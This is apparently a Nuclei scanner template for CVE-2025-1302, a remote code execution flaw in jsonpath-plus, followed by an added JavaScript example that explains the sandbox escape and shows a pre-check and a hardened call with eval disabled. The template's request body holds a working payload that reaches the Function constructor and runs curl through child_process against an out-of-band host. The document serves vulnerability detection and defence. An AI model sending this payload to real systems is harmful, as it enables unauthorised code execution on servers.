id: CVE-2025-1302

info:
  name: JSONPath Plus < 10.3.0 - Remote Code Execution
  author: Jaenact
  severity: critical
  description: |
    Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode: a filter expression can reach the Function constructor through ''['constructor']['constructor'] without ever naming eval, Function or require, so the "safe" evaluator does not block it.
    **Note:** This is caused by an incomplete fix for [CVE-2024-21534]
  impact: |
    Attackers can execute arbitrary code on the system, potentially leading to full system compromise.
  remediation: |
    Update to version 10.3.0 or later. Applications that accept user-supplied JSONPath expressions should additionally pass eval: false so that filter and script expressions are rejected rather than evaluated.
  reference:
    - https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585
    - https://github.com/JSONPath-Plus/JSONPath
    - https://github.com/EQSTLab/CVE-2025-1302
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1302
    - https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1302
    cwe-id: CWE-94
    epss-score: 0.10701
    epss-percentile: 0.95252
  metadata:
    verified: true
    max-request: 7
  tags: cve,cve2025,rce,jsonpath,vkev

http:
  - method: POST
    path:
      - "{{BaseURL}}/query"
      - "{{BaseURL}}/jsonpath"
      - "{{BaseURL}}/api/query"
      - "{{BaseURL}}/data"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/filter"
      - "{{BaseURL}}/expression"

    headers:
      Content-Type: application/json

    # The filter expression builds a function from a string via
    # ''['constructor']['constructor'] (String -> Function) and calls it;
    # inside that function `this` is globalThis, which exposes `process` under Node.
    body: |
      {
        "path": "$..[?(p=\"console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())\";Ethan=''[['constructor']][['constructor']](p);Ethan())]"
      }

    stop-at-first-match: true

    # Both must hold: the endpoint answered with a JSON result (so the path was
    # actually evaluated) and the injected curl produced an out-of-band DNS lookup.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":'

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100cda957f27595fc7f7037dbfc46c85fcce6ae825c97824b45c689af57c299cc50022100c42e405cec5821fcf1b17a466cb3a146d305850ab0ba8fb94f73f9036133b01d:922c64590222798bb761d5b6d8e72950
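The following is an added example, not part of the template above and not code from the jsonpath-plus project. It shows why the template's payload escapes the "safe" evaluator (the Function constructor is reached by property walking from an empty string, so no blocked identifier ever appears), an application-side pre-check that rejects any JSONPath capable of triggering expression evaluation, and the hardened jsonpath-plus call with eval disabled. It assumes Node.js; only queryJsonPathHardened() needs jsonpath-plus (>= 10.3.0) installed, and it loads that module lazily so everything else runs without it. The function names, the regexes and the sample document are this example's own.

```javascript
// Added example: why the CVE-2025-1302 payload works, plus a pre-check and a
// hardened call. Not from the nuclei template or the jsonpath-plus project.
// Assumes Node.js; jsonpath-plus is only required inside queryJsonPathHardened().

// The template's payload, verbatim. It is only ever inspected here, never evaluated.
const PAYLOAD =
  `$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]`;

// (1) The escape primitive. A "safe" evaluator that blocks the identifiers
// Function / eval / require / process never sees them: ''.constructor is String,
// String.constructor is Function, and both are reached by computed property access.
function functionConstructorViaString() {
  const F = ''[['constructor']][['constructor']]; // ['constructor'] coerces to "constructor"
  return F === Function;
}

// A function built through that constructor is ordinary sloppy-mode code. Called
// without a receiver, `this` is globalThis, where Node exposes `process`. This is
// the hook the payload uses (this.process.mainModule.require). Here the body only
// reports what `this.process` is instead of spawning child_process.
function escapedFunctionSeesProcess() {
  const built = ''[['constructor']][['constructor']]('return typeof this.process');
  return built(); // 'object' under Node
}

// (2) Defence in depth for code that must accept user-supplied paths. jsonpath-plus
// evaluates [?( ... )] filters and [( ... )] script expressions; the constructor walk
// is the signature of the known "safe"-mode escapes. Plain member/index paths pass.
const EVAL_SYNTAX = /\[\s*\??\s*\(/;   // matches "[?(" and "[("
const CONSTRUCTOR_WALK = /constructor/i;

function classifyJsonPath(path) {
  if (typeof path !== 'string' || path.length === 0 || path.length > 512) return 'reject:shape';
  if (EVAL_SYNTAX.test(path)) return 'reject:eval-expression';
  if (CONSTRUCTOR_WALK.test(path)) return 'reject:constructor-walk';
  return 'allow';
}

// (3) The hardened call. With eval: false, jsonpath-plus throws on any filter or
// script expression instead of evaluating it, so a path that slips past the
// pre-check still cannot run code. Assumes jsonpath-plus >= 10.3.0 is installed.
function queryJsonPathHardened(json, path) {
  const verdict = classifyJsonPath(path);
  if (verdict !== 'allow') throw new Error(`JSONPath rejected (${verdict})`);
  if (typeof require !== 'function') throw new Error('CommonJS require() unavailable');
  const { JSONPath } = require('jsonpath-plus');
  return JSONPath({ path, json, eval: false });
}

// Constructed sample document for running this file directly.
const SAMPLE = { users: [{ name: 'alice', role: 'admin' }, { name: 'bob', role: 'user' }] };

if (typeof require === 'function' && require.main === module) {
  console.log('String.constructor is Function:', functionConstructorViaString());
  console.log('escaped function sees this.process as:', escapedFunctionSeesProcess());
  console.log('template payload:', classifyJsonPath(PAYLOAD));
  console.log('benign path:     ', classifyJsonPath('$.users[*].name'));
  try {
    console.log('hardened query:', queryJsonPathHardened(SAMPLE, '$.users[*].name'));
  } catch (e) {
    console.log('hardened query skipped:', e.message);
  }
}
```

The pre-check is deliberately coarse: it refuses every filter and script expression, not just the known bypass string, because the "safe" evaluator has already been escaped twice (CVE-2024-21534 and this CVE) and blocklisting identifiers is what failed. If the application genuinely needs filters, the only sound options are upgrading and evaluating against a schema-restricted path grammar, not pattern-matching the attacker's JavaScript.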